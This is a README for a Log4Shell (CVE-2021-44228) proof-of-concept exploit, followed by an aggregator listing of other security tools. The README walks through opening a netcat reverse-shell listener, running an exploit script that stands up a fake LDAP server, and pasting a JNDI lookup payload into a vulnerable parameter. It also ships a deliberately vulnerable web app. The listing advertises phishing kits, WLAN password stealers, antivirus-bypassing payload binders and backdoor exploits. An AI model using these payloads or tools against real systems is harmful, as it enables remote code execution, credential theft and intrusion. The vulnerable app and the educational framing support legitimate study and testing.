A Proof-Of-Concept for the recently found CVE-2021-44228 vulnerability

Overview

log4j-shell-poc

A Proof-Of-Concept for the recently found CVE-2021-44228 vulnerability.

Recently there was a new vulnerability in log4j, a java logging library that is very widely used in the likes of elasticsearch, minecraft and numerous others.

In this repository we have made and example vulnerable application and proof-of-concept (POC) exploit of it.

A video showing the exploitation process

Vuln Web App:

webapp.mp4

Ghidra (Old script):

ghidra.mp4

Minecraft PoC (Old script):

mclol.mp4

Proof-of-concept (POC)

As a PoC we have created a python file that automates the process.

Requirements:

pip install -r requirements.txt

Usage:

  • Start a netcat listener to accept reverse shell connection.
nc -lvnp 9001
  • Launch the exploit.
    Note: For this to work, the extracted java archive has to be named: jdk1.8.0_20, and be in the same directory.
$ python3 poc.py --userip localhost --webport 8000 --lport 9001

[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc

[+] Exploit java class created success
[+] Setting up fake LDAP server

[+] Send me: ${jndi:ldap://localhost:1389/a}

Listening on 0.0.0.0:1389

This script will setup the HTTP server and the LDAP server for you, and it will also create the payload that you can use to paste into the vulnerable parameter. After this, if everything went well, you should get a shell on the lport.


Our vulnerable application

We have added a Dockerfile with the vulnerable webapp. You can use this by following the steps below:

1: docker build -t log4j-shell-poc .
2: docker run --network host log4j-shell-poc

Once it is running, you can access it on localhost:8080

If you would like to further develop the project you can use Intellij IDE which we used to develop the project. We have also included a .idea folder where we have configuration files which make the job a bit easier. You can probably also use other IDE's too.


Getting the Java version.

At the time of creating the exploit we were unsure of exactly which versions of java work and which don't so chose to work with one of the earliest versions of java 8: java-8u20.

Oracle thankfully provides an archive for all previous java versions:
https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html.
Scroll down to 8u20 and download the appropriate files for your operating system and hardware. Screenshot from 2021-12-11 00-09-25

Note: You do need to make an account to be able to download the package.

Once you have downloaded and extracted the archive, you can find java and a few related binaries in jdk1.8.0_20/bin.
Note: Please make sure to extract the jdk folder into this repository with the same name in order for it to work.

❯ tar -xf jdk-8u20-linux-x64.tar.gz

❯ ./jdk1.8.0_20/bin/java -version
java version "1.8.0_20"
Java(TM) SE Runtime Environment (build 1.8.0_20-b26)
Java HotSpot(TM) 64-Bit Server VM (build 25.20-b23, mixed mode)

Disclaimer

This repository is not intended to be a one-click exploit to CVE-2021-44228. The purpose of this project is to help people learn about this awesome vulnerability, and perhaps test their own applications (however there are better applications for this purpose, ei: https://log4shell.tools/).

Our team will not aid, or endorse any use of this exploit for malicious activity, thus if you ask for help you may be required to provide us with proof that you either own the target service or you have permissions to pentest on it.

Local File Inclusion Scanner and Exploiter

LFI-Paradise Local File Inclusion Scanner and Exploiter Features 1- Scanner 2- E

11 Sep 04, 2022
A simple python-function, to gain all wlan passwords from stored wlan-profiles on a computer.

Wlan Fetcher Windows10 Description A simple python-function, to gain all wlan passwords from stored wlan-profiles on a computer. Usage This Script onl

2 Nov 20, 2021
D-810 is an IDA Pro plugin which can be used to deobfuscate code at decompilation time by modifying IDA Pro microcode.

Introduction fork from https://gitlab.com/eshard/d810 What is D-810 D-810 is an IDA Pro plugin which can be used to deobfuscate code at decompilation

Banny 30 Dec 06, 2022
PyExtractor is a decompiler that can fully decompile exe's compiled with pyinstaller or py2exe

PyExtractor is a decompiler that can fully decompile exe's compiled with pyinstaller or py2exe with additional features such as malware checker/detector! Also checks file(s) for suspicious words, dis

Rdimo 56 Jul 31, 2022
Spring-0day/CVE-2022-22965

CVE-2022-22965 Spring Framework/CVE-2022-22965 Vulnerability ID: CVE-2022-22965/CNVD-2022-23942/QVD-2022-1691 Reproduce the vulnerability docker pull

iak 4 Apr 05, 2022
A proxy for asyncio.AbstractEventLoop for testing purposes

aioloop-proxy A proxy for asyncio.AbstractEventLoop for testing purposes. When tests writing for asyncio based code, there are controversial requireme

aio-libs 12 Dec 12, 2022
Just your basic port scanner - with multiprocessing capabilities & further nmap enumeration.

Just-Your-Basic-Port-Scanner Just your basic port scanner - with multiprocessing capabilities & further nmap enumeration. Use at your own discretion,

Edward Zhou 0 Nov 06, 2021
Scan publicly accessible assets on your AWS cloud environment

poro Description Scan for publicly accessible assets on your AWS environment Services covered by this tool: AWS ELB API Gateway S3 Buckets RDS Databas

9rnt 134 Dec 16, 2022
DCSync - DCSync Attack from Outside using Impacket

Adding DCSync Permissions Mostly copypasta from https://github.com/tothi/rbcd-at

n00py 77 Dec 16, 2022
Tool to decrypt iOS apps using r2frida

r2flutch Yet another tool to decrypt iOS apps using r2frida. Requirements It requires to install Frida on the Jailbroken iOS device: Jailbroken device

Murphy 146 Jan 03, 2023
Ensure secure infrastructure and consistency with the firewall rules

Python Port Scanner This script tries to check if it's possible to make a connection with the specific endpoint port. This is very useful to ensure se

Allan Avelar 7 Feb 26, 2022
Glass是一款针对资产列表的快速指纹识别工具,通过调用Fofa/ZoomEye/Shodan/360等api接口

Glass是一款针对资产列表的快速指纹识别工具,通过调用Fofa/ZoomEye/Shodan/360等api接口快速查询资产信息并识别重点资产的指纹,也可针对IP/IP段或资产列表进行快速的指纹识别。

s7ck Team 764 Jan 05, 2023
Better-rtti-parser - IDA script to parse RTTI information in executable

RTTI parser Parses RTTI information from executable. Example HexRays decompiler view Before: After: Functions window Before: After: Structs window Ins

101 Jan 04, 2023
Template for new OSINT command-line tools

OSINT cli tool skeleton Template for new OSINT command-line tools. Press button "Use this template" to generate your own tool repository. See INSTALL.

36 Dec 20, 2022
Cloud One Container Security Runtime Events Forwarder

Example on how to query events by a RESTful API, compose CEF event format and send the events to an UDP receiver.

Markus Winkler 3 Feb 10, 2022
The ultimate Metasploit apk binder with legit apk written in python3

Infector is a python3 based script which is officially made for linux based distro . It binds metasploit payload with original apk with avast antivirus bypassed .

27 Dec 25, 2022
Phishing-Crack tools to punish friends

Phishing-Crack Phishing Tool Version 1.0.0 Created By temirovazat A Phishing Tool With PHP and Python3 Features Fake Instagram Phishing Page Fake Face

3 Oct 04, 2022
Auerswald COMpact 8.0B Backdoors exploit

CVE-2021-40859 Auerswald COMpact 8.0B Backdoors exploit About Backdoors were discovered in Auerswald COMpact 5500R 7.8A and 8.0B devices, that allow a

6 Sep 22, 2022
Visius Heimdall is a tool that checks for risks on your cloud infrastructure

Heimdall Cloud Checker 🇧🇷 About Visius is a Brazilian cybersecurity startup that follows the signs of the crimson thunder ;) 🎸 ! As we value open s

visius 48 Jun 20, 2022
🔐 A simple command-line password manager.

PassVault What Is It? It is a command-line password manager, for educational purposes, that stores localy, in AES encryption, your sensitives datas in

5 Aug 15, 2022